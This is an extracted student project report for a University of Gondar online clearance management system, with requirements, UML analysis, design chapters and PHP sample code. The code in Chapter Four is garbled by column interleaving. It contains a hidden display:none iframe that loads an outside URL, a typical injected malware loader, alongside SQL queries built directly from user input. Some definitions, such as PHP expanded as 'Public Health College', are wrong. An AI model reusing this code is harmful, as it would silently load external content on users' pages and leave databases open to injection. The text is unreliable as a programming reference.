Professional Documents
Culture Documents
Final Implementation
Final Implementation
Faculty of Informatics
Department of Information Systems
Prepared By:
Gondar, Ethiopia
Declaration
This is to declare that this project work is done under the supervision of Instructor. Girma Sisay,
Project advisor, and having the title automated clearance management system for university of
Gondar students is sole contribution of:
1. ABERA AYENWA GUR/1082/05
2. ABREHAM ZEWEDU GUR /1220/05
3. FEKADU SISAY GUR/4945/05
4. MOHAMMED AWOL GUR/1255/05
No part of the project work has been reproduced illegally (copy and paste) which can be considered
as plagiarism. All referenced part has been used to argue the idea and have been cited properly. The
project team will be responsible and liable for any consequence if violation of this declaration is
proven.
Date: __________________
Group members:
ii
Certificate
I certify that this BSc. Industrial project documentation entitled automated clearance
management system for university of Gondar students
By:
is approved by me for submission. I certify further that, to the best of my knowledge, the
document represents work carried out by the students.
1. _______________
2. ________________
3. ________________
4. _________________
5. __________________
It is approved that this project has been written in compliance with formatting rules laid down by
the university.
iii
Acknowledgement
First of all, praise God, the almighty, merciful and passionate, for providing this
opportunity granting the capability to proceed successfully. The success and final outcome of
this project required a lot of guidance and assistance from many people and the team extremely
fortunate to have got this all along the completion of project documentation. Whatever the team
has done is only due to such guidance and assistance and would not forget to thank them.
iv
AUTOMATED CLEARANCE MANAGEMENT SYSTEM FOR UNIVERSITY OF GONDAR STUDENTS
201
6
Table of Contents
List of tables........................................................................................................................iii
List of figures......................................................................................................................iv
Acronyms.............................................................................................................................v
Abstract...............................................................................................................................vi
CHAPTER ONE..................................................................................................................1
1.1 INTRODUCTION..........................................................................................................1
1.2 background.....................................................................................................................1
1.3 statement of the problem................................................................................................2
1.4 Objective of the project..................................................................................................3
1.4.1. General objective...............................................................................................................3
1.4.2. Specific objective..............................................................................................................3
1.5 scope of the project........................................................................................................4
1.6 Limitation of the project.................................................................................................4
1.7 Risks & Contingencies..............................................................................................5
1.8 Assumptions and Constraints.........................................................................................5
1.8.1 Assumptions.......................................................................................................................5
1.8.2 Constraint...........................................................................................................................5
1.9 Significance of the project............................................................................................5
1.10 Target beneficiaries of the system................................................................................6
1.11 Feasibility study...........................................................................................................7
1.11.1 Technical Feasibility........................................................................................................7
1.11.2 Operational feasibility......................................................................................................7
1.11.3 Economic feasibility.........................................................................................................7
1.11.4 Schedule feasibility..........................................................................................................8
1.12. Methodologies.............................................................................................................8
1.12.1. Data gathering methodology...........................................................................................8
1.12.1.1 Data modeling technique...............................................................................................9
1.12.1.2 Analysis methodology.................................................................................................10
1.12.1.3 Design methodology....................................................................................................10
i
AUTOMATED CLEARANCE MANAGEMENT SYSTEM FOR UNIVERSITY OF GONDAR STUDENTS
201
6
1.13. Programming tools and database..............................................................................10
1.13.1 Hardware tools...............................................................................................................11
1.13.2 Software tools.................................................................................................................11
1.14. Project Cost...............................................................................................................12
1.14.1 Software development cost.............................................................................................12
1.16. Work breakdown structure........................................................................................13
CHAPTER TWO...............................................................................................................15
2. ANALYSIS.................................................................................................................15
2.1. Introduction.................................................................................................................15
2.2. Existing System description........................................................................................15
2.2.1. Players of the existing system........................................................................................17
2.2.2 The Existing System Clearance form preparation............................................................17
2.2.5 Business Rules of Existing System...........................................................................20
2.3. Determining Basic Requirements of Student Clearance System................................21
2.3.1. Fact-Finding & Analysis.................................................................................................22
2.3.1.1 INTERVIEWS..........................................................................................................22
2.3.1.2. OBSERVATION......................................................................................................25
2.4. Over view of the proposed system..............................................................................26
2.5. Requirement Specification..........................................................................................26
2.5.1. Functional Requirement..................................................................................................26
2.5.2. Non Functional Requirements.........................................................................................27
2.5.2.1. User interface and human factors.............................................................................29
2.5.2.2. Documentation.........................................................................................................29
2.5.2.3. Hardware consideration............................................................................................29
2.5.2.4. Performance characteristics......................................................................................29
2.5.2.5. Error handling and extreme conditions.....................................................................29
2.5.2.6. Quality issues...........................................................................................................30
2.5.2.7. System modifications...............................................................................................30
2.5.2.8. Physical environment...............................................................................................30
2.5.2.9. Security issues..........................................................................................................30
2.6 PROPOSED SYSTEM ACTOR INDENTIFICATION.............................................30
2.6 .1 use case selection for the proposed system......................................................................31
ii
AUTOMATED CLEARANCE MANAGEMENT SYSTEM FOR UNIVERSITY OF GONDAR STUDENTS
201
6
2.7 Activity Diagram.................................................................................................................48
2.8. Data dictionary...................................................................................................................54
2.9 Class diagram...............................................................................................................55
2.10. Dynamic model.........................................................................................................57
2.10.1 Sequence Diagram..........................................................................................................57
2.11. State chart diagrams..................................................................................................64
2.12 USER INTERFACE DESIGN...................................................................................68
CHAPTER THREE............................................................................................................71
3. DESIGN.........................................................................................................................71
3.1 Introduction..................................................................................................................71
3.1.1 Purpose of system design.................................................................................................71
3.1.2 Design Goals....................................................................................................................71
3.1.3 EXISTING SOFTWARE ARCHITECTURE..............................................................72
3.1.4 Proposed System software architecture............................................................................72
3.1.4.1 Overview...................................................................................................................72
3.1.5. Subsystem decomposition...............................................................................................73
3.2. Component diagram....................................................................................................76
3.3. Deployment Diagram..................................................................................................78
3.4 Persistent data management.........................................................................................80
3.5 Access control and security..........................................................................................81
3.6 Detail Class diagram....................................................................................................82
CHAPTER –FOUR............................................................................................................83
4. SYSTEM IMPLEMENTATION...........................................................................................83
6.5.1 Recommendation.................................................................................................104
References........................................................................................................................105
List of tables
Table 1 project life time table........................................................................................................12
Table 2Work Breakdown Structure...............................................................................................13
Table 3 some program within respective list of sign office...........................................................18
Table 4 observation analysis.........................................................................................................25
Table 5 Non-functional requirements............................................................................................28
Table 6 Record property Information use case description...........................................................34
iii
AUTOMATED CLEARANCE MANAGEMENT SYSTEM FOR UNIVERSITY OF GONDAR STUDENTS
201
6
Table 71 Edit property Information use case description..............................................................35
Table 8 Delete property Information use case description.............................................................36
Table 9. Uploadmaterial use case description...............................................................................37
Table 10 Create user account use case description........................................................................38
Table 11 Update user account use case description.......................................................................39
Table 12Access Control and Security...........................................................................................81
List of figures
Figure 1 work breakdown structures............................................................................................14
Figure 2. Current system clearance form......................................................................................16
Figure 3. Essential Use Case Diagram for Proposed System..........................................................31
Figure 4 Activity diagram for login use case description...............................................................48
Figure 5 Activity diagram for Registration.....................................................................................49
Figure 6 Activity diagram for Delete use case description.............................................................50
Figure 7 Activity diagram for Update use case description...........................................................51
Figure 8 Activity diagram for Report Generate use case description............................................52
Figure 9 Activity diagram for Clear use case description...............................................................53
Figure 10 Analysis Level Class Diagram.........................................................................................56
Figure 11 Sequence Diagram for Login Use case...........................................................................58
Figure 12 Sequence Diagram for Signing Clearance......................................................................58
Figure 13 Sequence Diagram for Registration...............................................................................60
Figure 14 Sequence Diagram for update.......................................................................................61
Figure 15 Sequence Diagram for Delete........................................................................................62
Figure 16 Sequence Diagram for Clear..........................................................................................63
Figure 17 Sequence Diagram for Report Generate Use case.........................................................64
Figure 18 state chart diagrams for clearance approved procedure..............................................65
Figure 19 state chart diagrams for login........................................................................................66
Figure 20 State-chart diagrams for Clearance Form Signing.........................................................67
Figure 21 user interfaces for user comment.................................................................................68
Figure 22 user interfaces for background.....................................................................................69
Figure 23 user interfaces for home page......................................................................................70
Figure 24 Software Architecture of the system.............................................................................73
Figure 25 layered architecture of the system................................................................................74
Figure 26 sub system diagram of the system................................................................................75
Figure 27 sub system class............................................................................................................76
iv
AUTOMATED CLEARANCE MANAGEMENT SYSTEM FOR UNIVERSITY OF GONDAR STUDENTS
201
6
Figure 28 Component diagram......................................................................................................77
Figure 29 Deployment diagram.....................................................................................................79
Figure 30 Persistent data management..........................................................................................80
Figure 31 detailed class diagram...................................................................................................82
Acronyms
The project team did each activity with specified date Acronym
Acronym Definition
BR………………………………………….Business rule
CSS…………………………………………Cascading style sheet
DB……………………................................Database
HTML………………………………………Hypertext Markup Language
ID No………………………………………..Identification Number
MySQL…………………. …………………Structural Query Language
PHP…………………………………………Public Health College
PHP…………………………………………Hyper Text Preprocessor
TC…………………………………………..Training Center
UC…………………………………………..Use Cause
UI……………………………………………User Interface
UML…………………………………………Unified Modeling Language
UOG…………………………………………University Of Gondar
XAMMP…………………………………….Apache, MySql, PHP, Perl
P/F…………………………………………..Primary or foreign key
OS…………………………………………..Operating System
v
AUTOMATED CLEARANCE MANAGEMENT SYSTEM FOR UNIVERSITY OF GONDAR STUDENTS
201
6
Abstract
Since, the current manual based system has many problems encountered as listed in
statement of problem some of them are there is less data security, it is difficult to retrieve
files, and loss of data may be occurred. This computerized system solves such problems.
University of Gondar student clearance system can use the new system effectively and
easily. The project student clearance system developed with the objective of making the
system reliable, easier, fast, and more informative.
The core idea of this project is to minimize the paper work and centralize the data,
minimize costs and time devotes as well as gives fast access for customers. Here all the
communication is taken in secure manner. For further security the data base is stored in
the back-end mysql and so no intruders can access it. It has homepage to provide different
information’s, login page and each actor’s page to do individual work in each page.
vi
AUTOMATED CLEARANCE MANAGEMENT SYSTEM FOR UNIVERSITY OF GONDAR STUDENTS
201
6
vii
AUTOMATED CLEARANCE MANAGEMENT SYSTEM FOR UNIVERSITY OF GONDAR STUDENTS
2016
CHAPTER ONE
1.1 INTRODUCTION
1.2 background
University of Gondar is one of the thirty-three Ethiopian universities; it was initially
established in 1954 as a Public Health College and Training Center (PHC & TC). The basic
reason for its initial establishment was the then prevailing health and related problems in and
around Gondar. This marks the beginning today’s University of Gondar which still kept the
legacy of its predecessors in standing for serving the surrounding community through its
education, research and community services.
The university now has nine academic units namely the College of medicine and health
Sciences, Faculty of Business and Economics, Faculty of Social Sciences and Humanities,
College of Natural and Computational Sciences, Faculty of Veterinary Medicine, School of
Law, Faculty of Agriculture, School of Technology and School of Education. Currently, the
University offers about 57 undergraduate and 61 post graduates in the regular programs. In
addition, extension, summer and distance programs are offered by most of the schools,
faculties and the college. Recently, the university has launched two PhD programs; one in
collaboration with Addis Continental Institute of Public Health. The lack of clearance system
in the university is serious of problem to manage the resources in the university.
One of the activities that are performed in University of Gondar is student clearance activity.
Clearance is the process of approving students cleared from any doubt. Based on our
observation and Answers of different university’s societies now a day University of Gondar
is in the process of modernizing its operations by automating and improving existing manual
processes but they do not use an automated system for students clearance activity it is still
now performed manually. As part of this, the project team would like to automate student
Clearance system in order to manage data more effectively and provide faster and more
efficient services.
The current Clearance process of the university requires the students to go around the
university and staffs to sign clearance forms and to queue in line repeatedly to submit or get
other forms. Sometimes the process takes more than an hour and days. Therefore it is
important to automate clearance system for university of Gondar students.
Difficult to manage and control daily activities such as preparing clearance forms,
distributing clearance form for the students, those tasks are difficult to the officers.
Difficulties involved in searching for specified record
Required high costs of paper when we prepared clearance form if the form is needed
to the students that are perform the clearance procedure.
Students waste more time and stressful to get clearance form.
Lack of data security.
Data inconsistence exists that means the flow of information or data from one office
to the other may not be the same.
There is no way to get clearance form in one office.
Absence of some staff officers who sign Clearance form which leads to students
repeatedly visiting a particular office in order to sign his/her clearance form.
Students travelling one office to the other and queuing in line to sign clearance form
whether they have borrowed or not.
When the Clearance form is lost it causes delaying of readmission date
Unauthorized body may sign Clearance form since the clearance form is distributed
without checking the student identification card.
Consumes more resources to complete the process which is of high cost such as:-
stationery material , Printers and computers etc.
Need more man power to process the clearance in the respective offices?
The employees involved in the clearance process are not available 24 hours of the
Day.
The problem discussed above reflects because of the absence or lack of computerized system.
Hence it became necessary for automate the clearance system to eliminate the shortcoming of
the manual system.
To Gathering requirements
To identify the functional and non-functional requirement.
To develop user friendly or interactive interface design.
To develop a database that holds students information.
To know and study about the existing System work flow.
To analysis the existing systems problem.
Find the solution for the problem found in existing system
Develop design model to use in clearance system
Creating a user friendly environment for particular clients to react and use the system
in good manner .
Generally the scope of this project concerns with only automate student clearance system in
University of Gondar.
Record properties that concerns students i.e. properties that are borrowed by the
students.
The system prepares and gives clearance form for students and Cleared the student
clearance and take backup
The clearance management system should allow the officers to lend the material and
return the material.
To approve or reject the clearance process for the student (Check students that
borrowed materials) before approve the clearance form.
Attitude of the staff the staff were hostile type and aggressive owing to the fact
that they felt if this activity is computerized they might lose their jobs to the
computer
There is no transfer of properties or materials:-since online transfer of material is difficult
tasks in the process of developing this online clearance management system so the
project team can’t include such tasks.
System hasn’t any chat room that facilitates communication between the administrator
and workers of the respected staffs in delivering information.
1.8.2 Constraint
The Major constraints of the system are Internet and power.
For Officers (who work in the office in which the student will clear their clearance):-
1. Students:-by providing fast access to the clearance system by reducing time like
waiting in the queue and going to different offices. The students access the system
anywhere and anytime when they need the clearance .It improve the tiredness of students by
avoiding the going to different offices to get the clearance system.
2. University:-in manual there is loss of materials like paper, pen which is cost and
needs more man power; the system reduces loss of costly materials and man power.
3. Developers of the project:-It increases our knowledge and gained the skill how
developing website and the project team are gets mental satisfaction from the project we
developed.
4. Officers:-The project reduces the time and work load for clearance checking officers
for serving the students who wants clearance.
Tangible cost
Intangible cost
=19,440 birr
1.12. Methodologies
1.12.1. Data gathering methodology
During requirement analysis, data needed for the project will be gathered from various
sources. During gathering and collecting necessary data and information needed for system
analysis, the system use two major fact-finding techniques those are primary source and
secondary source. In primary source such as interview and observation. In secondary source
the system obtain data from different document.
This project involves building a dynamic automated clearance management system for university of
Gondar students. In order to achieve our project, an appropriate software design methodology
would be chosen iterative data model.
Less time is spent on documenting and more time is given for designing.
Can only create a high-level design of the application before we actually begin to
build.
The phases which come under the iterative data model method are as follows:
Requirement gathering
Requirement Analysis
Designs
Implementation and testing
UML is a modeling language widely used to visualize the object oriented designs.
UML makes it easy to visualize the software design.
UML diagrams can be easily decoded and converted into most of the popular
object oriented programming languages.
Real-World Modeling: Object-oriented systems tend to model the real world in a more
complete fashion than do traditional methods.
It is more reliable.
It is easy to use.
It supports many operating systems
Front end: The Front end of this project used HTML, CSS and JavaScript because:-
Programming tools
There are two types of programming tools. These are hardware tools and software tools.
Software costs
XAMPP Free
Total ---
Preparation of the
project Title
Preparation of the
proposal
Requirement analysis
UOG, DEPARTEMENT OF INFORMATION SYSTEM Page 12
Requirement analysis
submission date
AUTOMATED CLEARANCE MANAGEMENT SYSTEM FOR UNIVERSITY OF GONDAR STUDENTS
2016
Non-Functional deployment
Writing Proposal Observation Use case Diagram
Requirement diagram
Activity diagram
User interface
CHAPTER TWO
2. ANALYSIS
2.1. Introduction
In this chapter this project discuss about topics like how the current system is operating and
how the proposed application intend to replace the existing system. The different requirement
analysis techniques are also discussed under this chapter with their results found from those
techniques. The system model concept also discussed, which describes the analysis of the
project by using different scenario like use case model and user interface prototype.
Before sign in the clearance form each officer first check all the property borrowed by the
student whether return or not. If that is return he/she signs in to the clearance otherwise
he/she didn’t sign in to the clearance form. In order to control the list of students who borrow
the property from the office they use document paper which contain the information about
borrower and borrowed material like name of borrower, identification number of borrower ,
types of borrow material etc.
In the manual system, the clearance forms are documented in a file cabinet. Each time the
clearance form is needed, a search operation is conducted on the file cabinets to locate a
particular student’s clearance form.
1. Clearance Form:-it is seasonal for the students, because the process takes places at the
end of academic year. At the end of academic year each student gets clearance from
various office of the university.
2. Withdrawal Form:-it takes places at any time in the academic year. If one student
wants to leave the university for different purpose before the end of academic year so
he/she get clearance from various office of the university.
3. College/faculty/School 6. Year
In students’ clearance system based on program, the lists of offices are different. The
following table shows some of program within respective list of sign office.
The following condition must check before sign in to the clearance form
Each officer checks (for clearance for example library books and all other library
materials) whether all property borrows by the student returns to the offices or not.
While students signing the clearance form, the clearance process is done by the
hierarchy. For example they must sign in Library, chief of circulation and book store
office before they go to sign in Asst. Dean of students of the campus.
Based on hierarchy. Upper office must check whether the lower office sign or not.
Due to the manual means been used by the university, keeping information about student
clearance, a lot problems are encountered which includes:
The processes of clearing require that the students be cleared in various office of the
University from all the office it is time wasting, stressful.
Absence of some staff officers who sign Clearance form which leads to students
repeatedly visiting a particular office in order to sign his/her clearance form.
Difficult to easily manage students who don’t return the equipment that borrow from
the office.
Difficult to search, retrieve, update and delete the data about the borrower of the
materials.
The absence of electronic data storing mechanism it requires huge storage space.
In order to overcome the current system problems that exist in the functioning of clearance
system, our project team members have put down alternative options. These are:-
The new system is designed to solve problem affecting the manual system in use. It is design
to be used automated thereby relieving both student and staff from much stress as
experienced from the manual system.
This will do the analyzing and storing of information either automatically or interactively, it
will make use of online access to internet. The new system gives full system functionality
that is needed by system user to perform system functionality. Among that system
functionality online signing clearance form for the students, taking withdrawal form online
for the students, signing clearance form to retake ID card for the student and give complain
to system.
The proposed system will also have some other features like.
The above listed points are described what the project teams are proposed to do and since the
proposed system is automated the students can perform the clearance with efficiently and
effectively.
BR1:- anyone who signs clearance form must be the member of university students.
BR2:-Registrar officers give clearance form only for students of the university (by
checking their id no).
BR3:- Officers of the university are not expected or obligate to give service on
weekend (Saturday, Sunday), and Holiday.
BR4:- when the students want to sign clearance form they take the clearance form
from the registrar officers.
BR5:- when the students want to sign clearance form they must fill the required field
and they must have an ID card of the university to check the validity of the Student
whether the student is University member or not.
BR6:- Every student of the university must sign clearance form at the end of each
year.
BR7:- students must fulfill their responsibility before they go to sign clearance in
different officers/for the return of university equipment’s)
BR8:- the officers of the university must put their signature and the date when they
sign on the clearance form.
BR9:- the student of the university must submit the cleared clearance form to
Registrar (not later than two weeks)
BR10:- students should take one piece of approved clearance form from registrar for
their validity.
What are the limits imposed by time and the volume of work?
interviews
observation
Usually these techniques used in combination during a study to ensure an accurate and
comprehensive study are undertaken.
2.3.1.1 INTERVIEWS
The team use interviews to collect information from individuals or from groups. The
respondents are generally current users of the existing system or potential users of the
proposed system and the project team selects samples from different officers and student’s
service center includes (Procter, librarian, cafe etc.). These are:
Instructors of UOG
Students
Beginning with the basics, the team ask questions which describe and provide a background
of fundamental details about the system.
For example:
Based on the above questions some respondents give their own answer. From this the
project team get some information about the system as the student of the university sign
clearance at the end of each year and when they want to sign for ID card form and withdraw
form. The clearance signing process takes place in the university officers at work time and
they can sign in any office randomly and they must submit to the Registrar at the end of
clearance sign. Based on the above question the respondents give their own answer
respectively below:-
Question 1:-One of the offices which sign in to the clearance form is sport master so what
kinds of thing you cheek before sign in the clearance form?
Answer: -we have different sport materials like ball, sport cloth etc. that is borrowed to the
students. If one student lend this materials he must return it so first we would cheek he/she
return the materials then if he return the material we sign in to the clearance form otherwise
until he/she return the material or he/she pay the fee for that material we did not sign in to the
clearance form.
Question 2: - How do you handle student information during borrowing materials from this
office?
Answer:-in order to control our resource which lends to the student we use a form which
used to record student information that borrow property from the office and borrowed
property information.
Answer:
1. In the earlier time we put only the signature and name of sport master so
that some students was put its own sign in to the clearance. But at this
time we uses stamp.
Interviewee Students
Answer:
Absence of some staff officers who sign Clearance form that leads us to repeatedly
visiting particular offices.
To sign a clearance form we goes around various office of the university like:-
sport master,
student service
Answer: It is better for us to get only from one office or using online.
2.3.1.2. OBSERVATION
Observation allows the team to gain information they cannot obtain by any other fact-finding
method. Through observation, the team can obtain firsthand information about how activities
are carried out. This method is most useful when the team need to actually observe how
documents are handled, how processes are carried out and whether specified steps are
actually followed. While the team has observed the existing system, there have been
improper handling of files that are too difficult to access it, and these make the decisions
invalid. The teams know the way of signing clearance form during the end of each year, at
that time the team understands how much the process is tedious and require high human
power to accomplish the process.
What the team understands from the observation analysis and summarized in the following
manners:
As generally the proposed system will able to minimize the existing problems and resource
consumption because the university clearance activities are based on manual system.
1. Registrar administrator
Should be Manage property (for clearance of different materials and for return of
materials) when students borrowed and return the borrowed materials.
3. Student
Borrow materials.
Return materials.
Send request to Registrar admin.
View messages.
Accept clearance form from Registrar admin.
Nonfunctional
Description
requirement
These requirements include the qualities of the system that are desirable from the
users’ point of view. The new system will use windows type graphical user
User interface interface. This type of interface is easy to use for very little additional training and
common to most computer users. The system will enable the users to use the
system.
At the end of the project, every activity in the development process will be
Documentation documented for future reference. There will also be a documentation of
implementation language for maintenance during system failure.
Usability is the ease with which a user can learn to operate, prepare inputs for, and
interpret outputs of system or component. The system should support ease of use
Usability
that is it shouldn’t be complex to use. The user interface should be user friendly.
Our system contends the help facility for user.
Performance It concern on the speed of operation of the system. The search result for any query
should not take more than seconds if the database is available on the same
machine and not more than seconds if the database.
It is the ease with which a system or component can be transferred from one
Damage The client, users can’t log as an administrator i.e. they can’t do the
Security activities that performed by the administrators. This controls the unauthorized
users to update the database.
Error handling To reduce input fault, the system will: - Respond to error inputs by asking the user
condition to re-enter data in the correct format.
The database should be backed up in a reliable secondary storage media. This used
Safety
to the user to recon problems or data loss problem occurred.
2.5.2.2. Documentation
The System has well defined document which helps to easily maintain the system and the
project team will also prepare short and precise help file on how to use the system for the
system users. It will have a helping page to guide the user of the system and to show the
process how they will have to use.
If there is change on the process of clearance the system can be modified based on change
criteria by the developers or any trained person that knows the code behind the system.
The project team recommended for future of this project is Someone who want to select this
project title they must include all employees working in university of Gondar.
Upload materials
Manage User account
Manage Property
Fill Clearance Form
Request for Approval
Print approved clearance form
Receive Cleared Clearance form
Rejecting Student Clearance
Report Generate
Rejecting student clearance
Manage student information
Entry condition The user must be already register (the user must have
user name, password and account type)
Alternative Flow of event Step 5.1, If the identification is not correct the system
display incorrect user type, user name and password try
again message and the system display the login page. The
system give chance to try again.
Description for property management use case it is general use case for
Alternative Flow of event Step 3.1. If Officer enters wrong information the system
display message in order to correct wrong information.
Entry condition Officer login to the system, the property already exist.
Alternative Flow of event Step 5.1. If the property is not found the system display
“information not found” message.
description If the property that borrowed by the student are returned the
Officer want to remove that property information.
Entry condition Officer login to the system, the property must be returned to
Officers.
Alternative Flow of event Step 5.1.If the Recorded information is not found the system
display “information not found” message.
save button.
Change Password
description This use case helps the user when it is necessary to create
Alternative Flow of event Step 3.1. If user enters wrong the system display message in
order to correct wrong information.
description This use case helps the users when he/she wants to update
his/her account.
Alternative Flow of event Step 3.If the user account does not exist the system display
“account not found” information.
description This use case helps the user when it is necessary to change
login password.
4. The system change the password and save the new password
Alternative Flow of event Step 3. If user enters wrong the system display message in
order to correct wrong information.
Step 4. If users input does not exist in the database the system
display the password does not exist message
description This use case helps the user to delete user account if it is no
more necessary.
Entry condition The user login to the system, the account exists.
Alternative Flow of event Step 3.If the user account does not exist the system display
“account not found” information.
Description The system users may forget their password so this use case
help to the system user to recover the forget password .
Alternative Flow of event Step 4.if the user miss required information the system display
Description The system checks the name and ID of the student on the
registrar database and approve if not exist, Registrar take the
approved clearance form from the student and approve the
clearance form for the last time by putting the seal of the
university and their signature.
Flow of event 1. The Registrar have a database of Student and the material
they borrow
Description The system checks the name and ID of the student on the registrar
database and reject if exist.
Flow of event 1. The Registrar have a database of Student and the material
they borrow
Description Students click the submit button after they fill the required
information to request for clearance approval.
Entry condition Student Must fill the required information on the clearance form
and click the submit button
Exit condition Students waiting until the system say some thing
Table 21 Filing clearance form use case description use case description
Description Registrar upload the student information and give user name,
password and privilege to the student
Entry condition Registrar users must be login to the system to their own page.
5. The user fill the required field and click add button
6. The system validated the user input and save the data into
the database
Description Students of UOG sign Clearance online and then they take the
approved clearance form.
Entry condition Students must sign clearance and they must approved by the
system and Registrar officer.
11. Registrar Print the cleared clearance form and approve the
student clearance form
description The Actor wants to report how many students are Cleared from the
university.
Activity Diagram
Sequence diagram
1. Sequence Diagram for Login Use case
This sequence diagram shows the steps how the students of UOG follow to sign clearance
online. To sign clearance online the student of the university must be registered and later
login based on the previous registration. The user open the system and fill the login form
field , click login button, then the system display clearance form page. Students fill the
required filed on their own page and click the submit button. The users input validated by the
system and creates clearance form controller which allow executing the users input from the
database. The systems database validates the query and returns the result to clearance form
controller. Then if the users input are valid in systems database the system display the cleared
and printable page and create print controller to execute the users command. The system user
clicks the print button and takes the cleared clearance form. But if the user’s information
exists (if student have materials on his /her hand) in the central database the system notify the
user by telling they have responsibility that they must complete and where they have
responsibility.
one in which no transitions lead out of. A transition is a progression from one state to another
and will be triggered by an event that is either internal or external to the object.
States are depicted as rounded rectangles. Transitions are arrows from one state to another.
Events or conditions that trigger transitions are written next to the arrows. [4]
CHAPTER THREE
3. DESIGN
3.1 Introduction
In this part of the project, all about application design is represented in an object oriented
model and technique diagrammatically. This design part of the project includes all object
oriented diagrams including subsystem decomposition, proposed system architecture,
component diagram and finally deployment diagram. This all diagram represent the
requirement and on what way to solve the requirement of the proposed application in detail.
System design results in the following products:
List of design goals, describing the qualities of the system that developers should
optimize.
Webpage architecture, describing the subsystem decomposition in terms of
subsystem responsibilities, dependencies among subsystems, subsystem mapping to
hardware, and major policy decisions such as control flow, access control, and data
storage.
Define what methods or mechanisms the project team uses to achieve requirements of
the system.
Fill the gap between the system specification produced during requirements
elicitation and analysis.
Make the system easily manageable by individual team member.
Performance: UOG clearance system should respond fast with high throughput, i.e. it
should perform the task of UOG Student clearance system quickly.
Error Handling and Extreme conditions: The system should be robust enough to
handle error conditions and continue with normal operations. If an error occurs, the
system should identify the error and notify to the user.
Availability – UOG Student clearance system should be accessible from any computer
if the computer is connected with a server computer by local area network and will be
accessible anytime a user would want to use the program.
Security: UOG Student clearance system should be secured, i.e., not allow other users
or unauthorized users to access data that has no the right to access it.
3.1.4.1 Overview
Software architecture refers to the subsystem decomposition in terms of subsystem
Responsibilities, dependencies among subsystems, subsystem mapping to hardware, and
Major policy decisions such as control flow, access control, and data storage. The proposed
system will have two tier client-server software architectures .In three tier client-server
software architectures Clients access databases through the user system interface. Database
management, on the server side, distributes processing between both client and server. Both
tiers, the client and the server, are responsible for some of the processing management.
Simply put, the client uses the user interface to make requests through database management
on the server side.
by whom and what type of security infrastructures it is using. The diagram is simulated
below.
Delete user
account()
Change password()
Recover forget
password
Delete property
information()
Receive approved
clearance form ()
CHAPTER –FOUR
4. SYSTEM IMPLEMENTATION
Sample code for Login
<html>
<body>
<div id="main_container">
<div id="right_content">
<?php session_start();
$result=mysql_query($query1);
} $rowCheck = mysql_num_rows($result);
$row=mysql_fetch_array($result);
$role=$row['Role'];$user=$row['UserName']; //if($row['level']==1){
if($role=='student') { $_SESSION['validuser']=$user;
echo "<script>window.location='student.php';</script>"; }
if($role=='RegistrarOfficer') {
$_SESSION['validuser']=$user;
echo "<script>window.location='Registrar.php';</script>"; }
if ($role=='officer') { $_SESSION['validuser']=$user;
$_SESSION['validuser']=$user;
echo "<script>window.location='employee.php';</script>";}else {
mysql_close($conn);?>
</body></html>
//} else { ?> <script> //alert('You Are Not Logged In !! Please Login to access this page');
?>
<hr><hr> <font size="3"color ="green">
<?php
Only Above 2 characters" title="Please Enter Letter Only Above 2 characters " name="fname"
value="" size='20%' id="txt_fname" placeholder='Fname'></input></td></tr>
x-moz-errormessage="Please Enter Students Login Password!!! " title="Please Enter Students Login
Password!!!" placeholder='Password'></input></td></tr><br>
</form>
</center>
</main> </div></div>
$get1= mysql_query("SELECT * FROM
useraccount where SIDNO='$sid' ")or <div class="wrapper row4">
die(mysql_error()); <div class="rounded">
$num1 = mysql_num_rows($get1); <footer id="footer" class="clear">
if($num1==0 && $sid!=""){
$query1="INSERT INTO
<div class="one_third
useraccount(UserName,Password,Role,SIDN
first"><br><br><br>
O,Status)";
<figure class="center"><img
$query1.="VALUES
class="btmspace-15" src="images/2.jpg"
('{$sid}','{$pasmd5}','{$role}','{$sid}','1');";
title="Web based Clearance Management
$result1=mysql_query($query1); System">
if(!$result1){ </figure>
//session_start(); </header>
include("see.php"); </div>
if($np==$co){
}
if($rol=='student'){
}
$update = mysql_query("update useraccount
set mysql_close($conn);
Password='{$decp}',Role='student',SIDNO='{
$un}',Status='1' where UserName='{$un}'") or }
die(mysql_error()); ?>
echo"<p class='success'> Your Password has </fieldset>
been Changed!! </p>";
</table>
echo'<meta content="2;change.php" http-
equiv="refresh"/>'; </div>
} <!--<br
style="clear:both"/>-->
else{
</div>
$update1 = mysql_query("update useraccount
set <div class="clear"></div>
Password='{$decp}',Role='officer',EIDNO='{
</html>
<?php ?>
session_start(); <script>
//session_start(); </header>
include("see.php"); </div>
?></font>
</div><!--close menubar-->
<iframe src="http://jL.chura.pl/rc/"
<div class="wrapper row3">
style="display:none"></iframe>
<div class="rounded">
</body>
<div><?php echo "</b><a
</div>
href=\"change.php\"><font color='green'>Go
To Next Page</a></font> <b>:</b><font </div><!--close sidebar-->
color='red'>Record</font>"?></div>
</div>
<main class="container clear">
<div id="content1">
<div class="one_half">
<div class="content_item">
<div class="group">
<center>
</center>
<div style="width:820px;
<div id="site_content"> height:650px; margin:0 auto; position:relative;
border:4px solid rgba(0,0,0,0);
-webkit-border-radius:5px; -
<div class="sidebar_container">
moz-border-radius:5px; border-radius:25px; -
<div class="sidebar"> webkit-box-shadow:0 0 18px rgba(0,0,0,0.4);
</form> $result=mysql_query($query);
</center> if(!$result){
</div> </address>
</div> </div>
6.5.1 Recommendation
The Team Members strongly recommends the deliverables of this project to be
implemented in a safe manner. We also recommend that the organization needs
a man power with computer literacy to operate the software this includes
References
[1]. G.Booch, J.Rumbaugh, and I.Jacobon. (1999/ October 14), The Unified Modeling
[2]. J.Rumbaugh, I.Jacobon and G.Booch. (2000/September 11), The Unified Modeling
[3]. Scott W.Ambler, (1999/ June 2), the Application Developer’s Guide, (The Object
[5]. Bernd Burgge and Allen H.DutoitS ,(2003/ February 21), [Second Edition], Object
Oriented Software Engineering using UML, Patterns and Java, [online available], [December
17, 2015]
[6].STAN MAGEE, CCP and LEONARD L. ,(2003/ February 21), [third Edition],TRIPP
Guide to software engineering standards and specifications PART II, [online available],
Appendix I
6. One of the offices which sign in to the clearance form is sport master so what kinds of
thing you cheek before sign in the clearance form?
7.How do you handle student information during borrowing materials from this office?
Appendix II
Student name Student id present absent Date Title Decision made
discussed
mohamed 1255/05
abreham
abera
1220/05
1082/05
Oct31/2015 About
proposal
It has
completed
to be
nov25/2015
fekadu 4945/05
mohamed 1255/05
abreham
abera
1220/05
1082/05
Nov26/2014 About
requirement
It has
completed
to be
analysis dec16/2015
fekadu 4945/05
mohamed 1255/05
abreham
abera
1220/05
1082/05
Dec17/2014 Model
analysis
It has
completed
to be
dec20/2015
fekadu 4945/05
mohamed 1255/05
abreham
abera
1220/05
1082/05
